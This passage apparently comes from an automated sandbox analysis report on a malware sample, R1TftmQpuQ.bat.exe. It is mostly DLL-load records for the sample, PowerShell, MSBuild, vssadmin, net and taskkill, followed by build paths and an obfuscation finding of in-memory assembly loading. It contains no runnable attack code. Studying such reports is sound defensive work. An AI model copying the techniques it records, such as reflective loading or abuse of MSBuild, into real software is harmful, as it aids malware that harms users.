        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeSection loaded: slc.dllJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: netapi32.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\System32\vssadmin.exeSection loaded: atl.dll
        Source: C:\Windows\System32\vssadmin.exeSection loaded: vssapi.dll
        Source: C:\Windows\System32\vssadmin.exeSection loaded: vsstrace.dll
        Source: C:\Windows\System32\vssadmin.exeSection loaded: vsstrace.dll
        Source: C:\Windows\System32\vssadmin.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\vssadmin.exeSection loaded: vss_ps.dll
        Source: C:\Windows\SysWOW64\net.exeSection loaded: mpr.dll
        Source: C:\Windows\SysWOW64\net.exeSection loaded: wkscli.dll
        Source: C:\Windows\SysWOW64\net.exeSection loaded: netutils.dll
        Source: C:\Windows\SysWOW64\net.exeSection loaded: samcli.dll
        Source: C:\Windows\SysWOW64\net.exeSection loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\net.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\SysWOW64\net1.exeSection loaded: samcli.dll
        Source: C:\Windows\SysWOW64\net1.exeSection loaded: netutils.dll
        Source: C:\Windows\SysWOW64\net1.exeSection loaded: dsrole.dll
        Source: C:\Windows\SysWOW64\net1.exeSection loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\net1.exeSection loaded: wkscli.dll
        Source: C:\Windows\SysWOW64\net1.exeSection loaded: logoncli.dll
        Source: C:\Windows\SysWOW64\net1.exeSection loaded: cryptbase.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
        Source: C:\Windows\SysWOW64\net.exeSection loaded: mpr.dll
        Source: C:\Windows\SysWOW64\net.exeSection loaded: wkscli.dll
        Source: C:\Windows\SysWOW64\net.exeSection loaded: netutils.dll
        Source: C:\Windows\SysWOW64\net.exeSection loaded: samcli.dll
        Source: C:\Windows\SysWOW64\net.exeSection loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\net.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\SysWOW64\net.exeSection loaded: mpr.dll
        Source: C:\Windows\SysWOW64\net.exeSection loaded: wkscli.dll
        Source: C:\Windows\SysWOW64\net.exeSection loaded: netutils.dll
        Source: C:\Windows\SysWOW64\net.exeSection loaded: samcli.dll
        Source: C:\Windows\SysWOW64\net.exeSection loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\net.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\SysWOW64\net1.exeSection loaded: samcli.dll
        Source: C:\Windows\SysWOW64\net1.exeSection loaded: netutils.dll
        Source: C:\Windows\SysWOW64\net1.exeSection loaded: dsrole.dll
        Source: C:\Windows\SysWOW64\net1.exeSection loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\net1.exeSection loaded: wkscli.dll
        Source: C:\Windows\SysWOW64\net1.exeSection loaded: logoncli.dll
        Source: C:\Windows\SysWOW64\net1.exeSection loaded: cryptbase.dll
        Source: C:\Windows\SysWOW64\net1.exeSection loaded: samcli.dll
        Source: C:\Windows\SysWOW64\net1.exeSection loaded: netutils.dll
        Source: C:\Windows\SysWOW64\net1.exeSection loaded: dsrole.dll
        Source: C:\Windows\SysWOW64\net1.exeSection loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\net1.exeSection loaded: wkscli.dll
        Source: C:\Windows\SysWOW64\net1.exeSection loaded: logoncli.dll
        Source: C:\Windows\SysWOW64\net1.exeSection loaded: cryptbase.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
        Source: C:\Windows\SysWOW64\net.exeSection loaded: mpr.dll
        Source: C:\Windows\SysWOW64\net.exeSection loaded: wkscli.dll
        Source: C:\Windows\SysWOW64\net.exeSection loaded: netutils.dll
        Source: C:\Windows\SysWOW64\net.exeSection loaded: samcli.dll
        Source: C:\Windows\SysWOW64\net.exeSection loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\net.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
        Source: C:\Windows\SysWOW64\net1.exeSection loaded: samcli.dll
        Source: C:\Windows\SysWOW64\net1.exeSection loaded: netutils.dll
        Source: C:\Windows\SysWOW64\net1.exeSection loaded: dsrole.dll
        Source: C:\Windows\SysWOW64\net1.exeSection loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\net1.exeSection loaded: wkscli.dll
        Source: C:\Windows\SysWOW64\net1.exeSection loaded: logoncli.dll
        Source: C:\Windows\SysWOW64\net1.exeSection loaded: cryptbase.dll
        Source: C:\Windows\SysWOW64\net.exeSection loaded: mpr.dll
        Source: C:\Windows\SysWOW64\net.exeSection loaded: wkscli.dll
        Source: C:\Windows\SysWOW64\net.exeSection loaded: netutils.dll
        Source: C:\Windows\SysWOW64\net.exeSection loaded: samcli.dll
        Source: C:\Windows\SysWOW64\net.exeSection loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\net.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\SysWOW64\net.exeSection loaded: mpr.dll
        Source: C:\Windows\SysWOW64\net.exeSection loaded: wkscli.dll
        Source: C:\Windows\SysWOW64\net.exeSection loaded: netutils.dll
        Source: C:\Windows\SysWOW64\net.exeSection loaded: samcli.dll
        Source: C:\Windows\SysWOW64\net.exeSection loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\net.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\SysWOW64\net1.exeSection loaded: samcli.dll
        Source: C:\Windows\SysWOW64\net1.exeSection loaded: netutils.dll
        Source: C:\Windows\SysWOW64\net1.exeSection loaded: dsrole.dll
        Source: C:\Windows\SysWOW64\net1.exeSection loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\net1.exeSection loaded: wkscli.dll
        Source: C:\Windows\SysWOW64\net1.exeSection loaded: logoncli.dll
        Source: C:\Windows\SysWOW64\net1.exeSection loaded: cryptbase.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
        Source: C:\Windows\SysWOW64\net1.exeSection loaded: samcli.dll
        Source: C:\Windows\SysWOW64\net1.exeSection loaded: netutils.dll
        Source: C:\Windows\SysWOW64\net1.exeSection loaded: dsrole.dll
        Source: C:\Windows\SysWOW64\net1.exeSection loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\net1.exeSection loaded: wkscli.dll
        Source: C:\Windows\SysWOW64\net1.exeSection loaded: logoncli.dll
        Source: C:\Windows\SysWOW64\net1.exeSection loaded: cryptbase.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
        Source: C:\Windows\SysWOW64\net.exeSection loaded: mpr.dll
        Source: C:\Windows\SysWOW64\net.exeSection loaded: wkscli.dll
        Source: C:\Windows\SysWOW64\net.exeSection loaded: netutils.dll
        Source: C:\Windows\SysWOW64\net.exeSection loaded: samcli.dll
        Source: C:\Windows\SysWOW64\net.exeSection loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\net.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\SysWOW64\net.exeSection loaded: mpr.dll
        Source: C:\Windows\SysWOW64\net.exeSection loaded: wkscli.dll
        Source: C:\Windows\SysWOW64\net.exeSection loaded: netutils.dll
        Source: C:\Windows\SysWOW64\net.exeSection loaded: samcli.dll
        Source: C:\Windows\SysWOW64\net.exeSection loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\net.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\SysWOW64\net1.exeSection loaded: samcli.dll
        Source: C:\Windows\SysWOW64\net1.exeSection loaded: netutils.dll
        Source: C:\Windows\SysWOW64\net1.exeSection loaded: dsrole.dll
        Source: C:\Windows\SysWOW64\net1.exeSection loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\net1.exeSection loaded: wkscli.dll
        Source: C:\Windows\SysWOW64\net1.exeSection loaded: logoncli.dll
        Source: C:\Windows\SysWOW64\net1.exeSection loaded: cryptbase.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
        Source: C:\Windows\SysWOW64\net1.exeSection loaded: samcli.dll
        Source: C:\Windows\SysWOW64\net1.exeSection loaded: netutils.dll
        Source: C:\Windows\SysWOW64\net1.exeSection loaded: dsrole.dll
        Source: C:\Windows\SysWOW64\net1.exeSection loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\net1.exeSection loaded: wkscli.dll
        Source: C:\Windows\SysWOW64\net1.exeSection loaded: logoncli.dll
        Source: C:\Windows\SysWOW64\net1.exeSection loaded: cryptbase.dll
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
        Source: R1TftmQpuQ.batStatic file information: File size 1312943 > 1048576
        Source: Binary string: C:\Users\Administrator\Desktop\PureProducts\Builds\6ed9-0064-4a97-9c26-55a0-a5e2-4945\WindowsFormsApp1\bin\Release\Sapmrhaa.pdb source: R1TftmQpuQ.bat.exe, 00000004.00000002.2657659049.0000000007FE0000.00000004.08000000.00040000.00000000.sdmp, R1TftmQpuQ.bat.exe, 00000004.00000002.2491514009.0000000005B0D000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: R1TftmQpuQ.bat.exe, 00000004.00000002.2692499417.0000000008660000.00000004.08000000.00040000.00000000.sdmp, R1TftmQpuQ.bat.exe, 00000004.00000002.2395167892.0000000005177000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: powershell.pdbUGP source: R1TftmQpuQ.bat.exe, 00000004.00000000.2094721092.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, R1TftmQpuQ.bat.exe.0.dr
        Source: Binary string: powershell.pdb source: R1TftmQpuQ.bat.exe, 00000004.00000000.2094721092.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, R1TftmQpuQ.bat.exe.0.dr
        Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256 source: R1TftmQpuQ.bat.exe, 00000004.00000002.2692499417.0000000008660000.00000004.08000000.00040000.00000000.sdmp, R1TftmQpuQ.bat.exe, 00000004.00000002.2395167892.0000000005177000.00000004.00000800.00020000.00000000.sdmp

        Data Obfuscation

        barindex
        Source: 4.2.R1TftmQpuQ.bat.exe.5b0da48.3.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
        Source: 4.2.R1TftmQpuQ.bat.exe.5b0da48.3.raw.unpack, ListDecorator.cs.Net Code: Read
        Source: 4.2.R1TftmQpuQ.bat.exe.5b0da48.3.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
        Source: 4.2.R1TftmQpuQ.bat.exe.5b0da48.3.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
        Source: 4.2.R1TftmQpuQ.bat.exe.5b0da48.3.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
        Source: 4.2.R1TftmQpuQ.bat.exe.5b0da48.3.raw.unpack, Elwj.cs.Net Code: Wuuoeos System.AppDomain.Load(byte[])
        Source: 4.2.R1TftmQpuQ.bat.exe.7fe0000.5.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
